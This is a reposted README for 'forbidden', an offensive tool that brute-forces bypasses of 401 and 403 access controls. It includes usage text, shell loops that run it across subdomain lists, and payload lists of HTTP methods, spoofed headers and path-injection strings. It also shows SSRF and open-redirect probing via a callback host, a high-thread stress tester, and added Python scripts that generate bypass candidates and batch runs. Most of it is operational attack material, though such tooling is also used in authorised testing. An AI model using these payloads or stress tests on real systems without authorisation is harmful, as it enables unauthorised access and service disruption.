Bypassing 4xx HTTP response status codes with PycURL: forbidden

Author: Sec-Labs | Published:

Project introduction

Bypass 4xx HTTP response status codes, based on PycURL.

The script uses multithreading and relies on brute forcing, so it may produce some false positive results. The script has colored output.

Results are sorted by HTTP response status code ascending, content length descending, and ID ascending.

To filter out false positives manually, run the provided cURL command once for each unique content length and check the response. If it does not result in a bypass, ignore all results with the same content length.

Test scope (the -t value for each item is given in parentheses)
HTTP methods - w/ both HTTP and HTTPS requests, and 'Content-Length: 0' header (-t methods)
Cross-site tracing (XST) with HTTP TRACE and TRACK methods (-t methods)
[Text] file upload with HTTP PUT method (-t methods)
HTTP method overrides - w/ HTTP headers, and URL parameters (-t method-overrides)
URL scheme overrides (-t scheme-overrides)
Port overrides (-t port-overrides)
Information disclosure with 'Accept' header (-t headers)
HTTP headers (-t headers)
URL overrides - w/ accessible path, and double 'Host' header (-t headers)
URL path bypasses (-t paths)
URL transformations and encodings (-t encodings)
Basic and bearer authentication - w/ null session, and invalid tokens (-t auths)
Open redirects and server-side request forgery (SSRF) - HTTP headers only (-t redirects)
Broken URL parsers (-t parsers)

See the stress testing script, stresser.py, below. Inspired by this write-up.

Extend these scripts to your liking.

A good source of HTTP headers.

Tested on Kali Linux v2022.2 (64-bit).

Made for educational purposes. I hope it helps!

Remarks

  • Some websites might require a valid or specific User-Agent HTTP request header.
  • Some web proxies might modify some HTTP requests (e.g. the encoded requests in the encodings scope).
  • Beware of rate limiting and other similar protections; wait some time before running the script again against the same domain.
  • Connection timeout is set to 90 seconds and response timeout to 180 seconds.
  • The average runtime of all tests on a single thread is 12 minutes; the optimal number of threads is 5.
  • The length attribute in the results includes only the length of the HTTP response body.
  • Cross-site tracing (XST) is no longer considered a vulnerability.
  • The cURL command for the double 'Host' header test does not work, because cURL does not allow two 'Host' headers; I had to send those HTTP requests with the requests library.

High priority plans

  • More path bypasses
  • Add an option to wait/sleep between requests on a single thread
  • Limit the test scope to allowed HTTP methods (obtained with the HTTP OPTIONS method)
  • Do not ignore URL parameters and fragments
  • Add an option to ignore multiple texts

Low priority plans

  • Log4j support
  • Add a table output for more readable results that take less space
  • Add an option to test custom HTTP header and value pairs against a list of domains/subdomains

How to run

Open your preferred console from /src/ and run the commands below.

Install required tools:

apt-get install -y curl

Install required packages:

pip3 install -r requirements.txt

Run the script:

python3 forbidden.py

Automation

Bypass 403 Forbidden HTTP response status code:

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t methods,method-overrides,scheme-overrides,port-overrides,headers,paths,encodings -f GET -l base,path -o "forbidden_403_results_${count}.json"; done

Bypass 403 Forbidden HTTP response status code with stress testing:

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 stresser.py -u "${subdomain}" -dir "stresser_403_results_${count}" -r 1000 -th 200 -f GET -l base -o "stresser_403_results_${count}.json"; done

Bypass 401 Unauthorized HTTP response status code:

count=0; for subdomain in $(cat subdomains_401.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t auths -f GET -l base -o "forbidden_401_results_${count}.json"; done

Scan for open redirects and server-side request forgery (SSRF):

count=0; for subdomain in $(cat subdomains_live_long.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t redirects -f GET -l base -e xyz.interact.sh -o "forbidden_redirect_results_${count}.json"; done

Scan for broken URL parsers:

count=0; for subdomain in $(cat subdomains_live_long.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t parsers -f GET -l base -e xyz.interact.sh -o "forbidden_parser_results_${count}.json"; done
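The loops above do the job, but `$(cat file)` word-splits the target list, chokes on CRLF files and comments, and fires one scan straight after another, which is exactly what the rate-limiting remark warns about. The following batch runner is an added example written for this page; it is not part of the forbidden project. It assumes forbidden.py is in the current directory, uses only options listed in the usage section below, and the target list in the demo is constructed for the example.

```python
"""
Added example, not part of the forbidden project: a batch runner that does the
job of the shell loops above from Python. It reads one target per line (blank
lines, '#' comments and CRLF endings are tolerated), numbers the output files
the same way as the loops, and pauses between targets in line with the
rate-limiting remark. Only options from the usage section are used;
forbidden.py is assumed to be in the current directory. The targets in the
demo are constructed for this example.
"""
import shlex
import subprocess
import time


def parse_targets(text):
    """Return the non-empty, non-comment lines of a targets file, stripped."""
    targets = []
    for raw in text.splitlines():  # splitlines() also handles '\r\n'
        line = raw.strip()
        if line and not line.startswith("#"):
            targets.append(line)
    return targets


def build_command(target, tests, output, force="GET", lengths=("base",),
                  evil=None, threads=None):
    """argv for one forbidden.py run; mirrors the flags used in the loops above."""
    argv = ["python3", "forbidden.py", "-u", target, "-t", tests, "-f", force,
            "-l", ",".join(lengths), "-o", output]
    if evil:
        argv += ["-e", evil]          # redirects / parsers scopes need a callback host
    if threads:
        argv += ["-th", str(threads)]
    return argv


def plan_batch(text, tests, prefix, **options):
    """(number, target, argv) for every target, numbering from 1 like the loops."""
    return [(n, t, build_command(t, tests, f"{prefix}_{n}.json", **options))
            for n, t in enumerate(parse_targets(text), start=1)]


def run_batch(text, tests, prefix, pause=30.0, dry_run=False, **options):
    """Run (or, with dry_run, only print) one forbidden.py invocation per target.

    `pause` seconds are slept between targets; the remark above warns that
    running back-to-back against the same infrastructure trips rate limits.
    """
    plan = plan_batch(text, tests, prefix, **options)
    for n, target, argv in plan:
        print(f"#{n} | {target}")
        if dry_run:
            print(shlex.join(argv))
        else:
            subprocess.run(argv, check=False)   # a failing target must not stop the batch
            if n < len(plan):
                time.sleep(pause)
    return len(plan)


if __name__ == "__main__":
    # Constructed target list: one CRLF line, one blank line, one comment.
    DEMO_TARGETS = "https://a.example.com/admin\r\n\n# old host, skip\nhttps://b.example.com/admin\n"
    run_batch(DEMO_TARGETS,
              "methods,method-overrides,scheme-overrides,port-overrides,headers,paths,encodings",
              "forbidden_403_results", lengths=("base", "path"), dry_run=True)
```

With `dry_run=True` it only prints the exact command lines, which is a cheap way to review the batch before anything is sent; `pause` is per target, not per request, so the in-script threading remark still applies.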

HTTP methods

ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL

HTTP headers

Method overrides:

X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override

Scheme overrides:

Front-End-HTTPS
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-SSL
X-URL-Scheme
X-URLSCHEME

Port overrides:

X-Forwarded-Port

Default:

Base-URL
CF-Connecting-IP
Client-IP
Cluster-Client-IP
Connection
Contact
Destination
Forwarded
Forwarded-For
Forwarded-For-IP
From
Host
Origin
Profile
Proxy
Redirect
Referer
Request-URI
Stuff
True-Client-IP
URI
URL
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Host
X-Host-Override
X-HTTP-DestinationURL
X-HTTP-Host-Override
X-Originally-Forwarded-For
X-Original-Remote-Addr
X-Original-URL
X-Originating-IP
X-Override-URL
X-Proxy-URL
X-ProxyUser-IP
X-Real-IP
X-Referer
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Server-IP
X-Wap-Profile

URL paths

Injected at the beginning, end, and both beginning and end of the URL path. All combinations.

/
//
%09
%20
%23
%2e
*
.
..
;
.;
..;
;foo=bar;

Injected at the end of the URL path.

#
##
##random
*
**
**random
.
..
..random
?
??
??random
~
~~
~~random

Injected at the end of the URL path, but only if the URL path does not end with '/'.

.asp
.aspx
.esp
.html
.jhtml
.json
.jsp
.jspa
.jspx
.php
.sht
.shtml
.xhtml
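The three injection rules above are easier to reason about when the candidate list can be generated offline and read. The generator below is an added example written for this page, not the forbidden project's own code, and it fills in details the page leaves open: a "beginning" payload is placed as its own segment right after the leading slash (so `..;` gives `/..;/admin`, while `/` and `//` are joined directly to give `//admin` and `///admin`), an "end" payload is appended verbatim, "all combinations" is read as every ordered pair of a beginning and an end payload where either may be empty, and "random" is a caller-supplied or generated token. The exact concatenation forbidden.py uses may differ.

```python
"""
Added example, not the forbidden project's own code: builds the URL-path
bypass candidates described above so the rules can be inspected without
sending a single request.

Assumptions (the page does not state them):
  * "beginning": payload becomes the first path segment (/..;/admin); a
    payload that already ends in "/" is joined directly (//admin).
  * "end": payload is appended verbatim (/admin..;).
  * "all combinations": every ordered (beginning, end) pair, either side
    possibly empty; the unmodified URL itself is excluded.
  * "random": a caller-supplied token, else a fresh hex token.
"""
import secrets
from urllib.parse import urlsplit, urlunsplit

# Injected at the beginning, end, and both (all combinations).
COMBINATION_PAYLOADS = ["/", "//", "%09", "%20", "%23", "%2e", "*", ".", "..",
                        ";", ".;", "..;", ";foo=bar;"]

# Injected at the end only; "random" is replaced by a token.
END_PAYLOADS = ["#", "##", "##random", "*", "**", "**random", ".", "..",
                "..random", "?", "??", "??random", "~", "~~", "~~random"]

# Appended at the end only when the path does not already end with "/".
EXTENSIONS = [".asp", ".aspx", ".esp", ".html", ".jhtml", ".json", ".jsp",
              ".jspa", ".jspx", ".php", ".sht", ".shtml", ".xhtml"]


def _inject_beginning(path, payload):
    """Insert payload as the first segment of an absolute path (assumed layout)."""
    rest = path.lstrip("/")
    if payload.endswith("/"):
        return "/" + payload + rest
    return "/" + payload + "/" + rest


def path_bypasses(url, rand=None):
    """Return the ordered, de-duplicated candidate URLs for `url`.

    Query string and fragment are discarded, matching the tool's documented
    behaviour of ignoring parameters and fragments.
    """
    parts = urlsplit(url)
    base = urlunsplit((parts.scheme, parts.netloc, "", "", ""))
    path = parts.path or "/"
    rand = rand if rand is not None else secrets.token_hex(4)

    candidates = []
    seen = set()

    def add(mutated):
        full = base + mutated
        if full not in seen:          # "*", "." and ".." appear in two lists
            seen.add(full)
            candidates.append(full)

    # Rule 1: beginning / end / both, all combinations ("" means no injection).
    for start in [""] + COMBINATION_PAYLOADS:
        for end in [""] + COMBINATION_PAYLOADS:
            if not start and not end:
                continue              # that would be the unmodified URL
            mutated = _inject_beginning(path, start) if start else path
            add(mutated + end)

    # Rule 2: end only, with "random" expanded to the token.
    for payload in END_PAYLOADS:
        add(path + payload.replace("random", rand))

    # Rule 3: extensions, only when the path is not a directory reference.
    if not path.endswith("/"):
        for ext in EXTENSIONS:
            add(path + ext)

    return candidates


if __name__ == "__main__":
    for candidate in path_bypasses("https://example.com/admin", rand="abcd"):
        print(candidate)
```

Feeding the output to cURL requires `--path-as-is` (as the tool's own commands do), otherwise the client normalises `..` and `.` segments away before the request leaves the machine, and the `#` and `?` variants must be passed as the literal URL rather than as query or fragment.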

Results format

[
   {
      "id":"559-HEADERS-2",
      "url":"https://example.com:443/admin",
      "method":"GET",
      "headers":[
         "Host: 127.0.0.1"
      ],
      "body":null,
      "agent":"Forbidden/7.8",
      "command":"curl --connect-timeout 90 -m 180 -iskL --max-redirs 10 --path-as-is -H 'Host: 127.0.0.1' -H 'User-Agent: Forbidden/7.8' -X 'GET' 'https://example.com:443/admin'",
      "code":200,
      "length":255408
   },
   {
      "id":"560-HEADERS-2",
      "url":"https://example.com:443/admin",
      "method":"GET",
      "headers":[
         "Host: 127.0.0.1:443"
      ],
      "body":null,
      "agent":"Forbidden/7.8",
      "command":"curl --connect-timeout 90 -m 180 -iskL --max-redirs 10 --path-as-is -H 'Host: 127.0.0.1:443' -H 'User-Agent: Forbidden/7.8' -X 'GET' 'https://example.com:443/admin'",
      "code":200,
      "length":255408
   }
]
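The two records above share a content length, which is exactly the case the manual filtering note covers: one replayed cURL command decides the fate of the whole group. The script below is an added example written for this page, not part of the forbidden project. It parses this JSON format, applies the documented sort order (status code ascending, content length descending, id ascending), drops lengths that are known noise (the same idea as the `-l base,path` option; here the base length is passed in explicitly because the example does not fetch anything), and emits one cURL command per remaining length. The records in `SAMPLE_RESULTS` are constructed for the example; ids, lengths and header values are illustrative.

```python
"""
Added example, not part of the forbidden project: post-processing for the
results JSON shown above. Sort order follows the page (code asc, length desc,
id asc); known false-positive lengths are removed; one record per remaining
length is kept so that a single replayed cURL command confirms or discards
the whole group. SAMPLE_RESULTS is constructed sample data.
"""
import json

BASE_URL = "https://example.com:443/admin"


def _rec(rid, headers, code, length, url=BASE_URL):
    """Build one record in the tool's output shape (constructed sample data)."""
    hdrs = "".join(f"-H '{h}' " for h in headers)
    return {"id": rid, "url": url, "method": "GET", "headers": headers, "body": None,
            "agent": "Forbidden/7.8",
            "command": f"curl --connect-timeout 90 -m 180 -iskL --max-redirs 10 --path-as-is "
                       f"{hdrs}-H 'User-Agent: Forbidden/7.8' -X 'GET' '{url}'",
            "code": code, "length": length}


SAMPLE_RESULTS = json.dumps([
    _rec("559-HEADERS-2", ["Host: 127.0.0.1"], 200, 255408),
    _rec("560-HEADERS-2", ["Host: 127.0.0.1:443"], 200, 255408),
    _rec("12-PATHS-1", [], 200, 9812, url=BASE_URL + "..;"),
    _rec("301-HEADERS-4", ["X-Original-URL: /admin"], 200, 1234),   # same length as the base page
    _rec("41-AUTHS-1", ["Authorization: Bearer null"], 401, 178),
])


def load_results(text):
    """Parse the JSON array written by forbidden.py's -o option."""
    return json.loads(text)


def id_number(record):
    """Numeric prefix of ids such as '559-HEADERS-2', used as the final sort key."""
    head = record["id"].split("-", 1)[0]
    return int(head) if head.isdigit() else 0


def sort_results(records):
    """Status code ascending, content length descending, id ascending."""
    return sorted(records, key=lambda r: (r["code"], -r["length"], id_number(r)))


def filter_lengths(records, ignore_lengths):
    """Drop every record whose body length is in ignore_lengths.

    Pass the lengths of the base (forbidden) response and of the accessible
    path response here; a "bypass" that returns exactly those bodies is noise.
    """
    ignore = set(ignore_lengths)
    return [r for r in records if r["length"] not in ignore]


def verification_plan(records, ignore_lengths=()):
    """One entry per unique content length, in sort order.

    Each entry carries the first record seen for that length plus how many
    records share it, so replaying that one cURL command settles the group.
    """
    plan = {}
    for r in sort_results(filter_lengths(records, ignore_lengths)):
        entry = plan.get(r["length"])
        if entry is None:
            plan[r["length"]] = {"length": r["length"], "count": 1, "id": r["id"],
                                 "code": r["code"], "command": r["command"]}
        else:
            entry["count"] += 1
    return list(plan.values())


if __name__ == "__main__":
    # 1234 is the (constructed) base response length; the tool measures it itself.
    for entry in verification_plan(load_results(SAMPLE_RESULTS), ignore_lengths=[1234]):
        print(f"{entry['code']} len={entry['length']:<7} x{entry['count']}  {entry['command']}")
```

A 401 group sorts after every 200 group, so the commands worth replaying first are at the top; a length that survives filtering but replays to the same "forbidden" page as the base URL should be added to the ignore list and the plan regenerated.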

Usage

forbidden.py

Forbidden v7.8 ( github.com/ivan-sincek/forbidden )

Usage:   python3 forbidden.py -u url                       -t tests [-f force] [-v values    ] [-p path            ] [-o out         ]
Example: python3 forbidden.py -u https://example.com/admin -t all   [-f GET  ] [-v values.txt] [-p /home/index.html] [-o results.json]

DESCRIPTION
    Bypass 4xx HTTP response status codes and more
URL
    Inaccessible or forbidden URL
    Parameters and fragments are ignored
    -u <url> - https://example.com/admin | etc.
TESTS
    Tests to run
    Use comma separated values
    -t <tests> - methods | [method|scheme|port]-overrides | headers | paths | encodings | auths | redirects | parsers | all
FORCE
    Force an HTTP method for nonspecific test cases
    -f <force> - GET | POST | CUSTOM | etc.
VALUES
    File with additional HTTP header values such as internal IPs, etc.
    Spacing will be stripped, empty lines ignored, and duplicates removed
    Scope: headers
    -v <values> - values.txt | etc.
PATH
    Accessible URL path to test URL overrides
    Scope: headers
    Default: /robots.txt
    -p <path> - /home/index.html | /README.txt | etc.
EVIL
    Specify (strictly) evil domain name with no port to test URL overrides
    Scope: headers | redirects
    Default: github.com
    -e <evil> - xyz.interact.sh | xyz.burpcollaborator.net | etc.
IGNORE
    Filter out 200 OK false positive results by text
    Spacing will be stripped
    -i <ignore> - Forbidden | "Access Denied" | etc.
LENGTHS
    Filter out 200 OK false positive results by content lengths
    Specify 'base' to ignore content length of base HTTP response
    Specify 'path' to ignore content length of accessible URL response
    Use comma separated values
    -l <lengths> - 12 | base | path | etc.
THREADS
    Number of parallel threads to run
    More threads make it quicker but can give worse results
    Heavily depends on network bandwidth and server capacity
    Default: 5
    -th <threads> - 200 | etc.
AGENT
    User agent to use
    Default: Forbidden/7.8
    -a <agent> - curl/3.30.1 | etc.
PROXY
    Web proxy to use
    -x <proxy> - 127.0.0.1:8080 | etc.
OUT
    Output file
    -o <out> - results.json | etc.

stresser.py

Stresser v2.8 ( github.com/ivan-sincek/forbidden )

Usage:   python3 stresser.py -u url                        -dir directory -r repeat -th threads [-f force] [-o out         ]
Example: python3 stresser.py -u https://example.com/secret -dir results   -r 1000   -th 200     [-f GET  ] [-o results.json]

DESCRIPTION
    Bypass 4xx HTTP response status codes with stress testing
URL
    Inaccessible or forbidden URL
    Parameters and fragments are ignored
    -u <url> - https://example.com/secret | etc.
DIRECTORY
    Output directory
    All valid and unique HTTP responses will be saved in this directory
    -dir <directory> - results | etc.
REPEAT
    Number of HTTP requests to send for each test case
    -r <repeat> - 1000 | etc.
THREADS
    Number of parallel threads to run
    -th <threads> - 200 | etc.
FORCE
    Force an HTTP method for nonspecific test cases
    -f <force> - GET | POST | CUSTOM | etc.
IGNORE
    Filter out 200 OK false positive results by text
    Spacing will be stripped
    -i <ignore> - Forbidden | "Access Denied" | etc.
LENGTHS
    Filter out 200 OK false positive results by content lengths
    Specify 'base' to ignore content length of base HTTP response
    Use comma separated values
    -l <lengths> - 12 | base | etc.
AGENT
    User agent to use
    Default: Stresser/2.8
    -a <agent> - curl/3.30.1 | etc.
PROXY
    Web proxy to use
    -x <proxy> - 127.0.0.1:8080 | etc.
OUT
    Output file
    -o <out> - results.json | etc.

Project URL

https://github.com/ivan-sincek/forbidden

Tags: tool sharing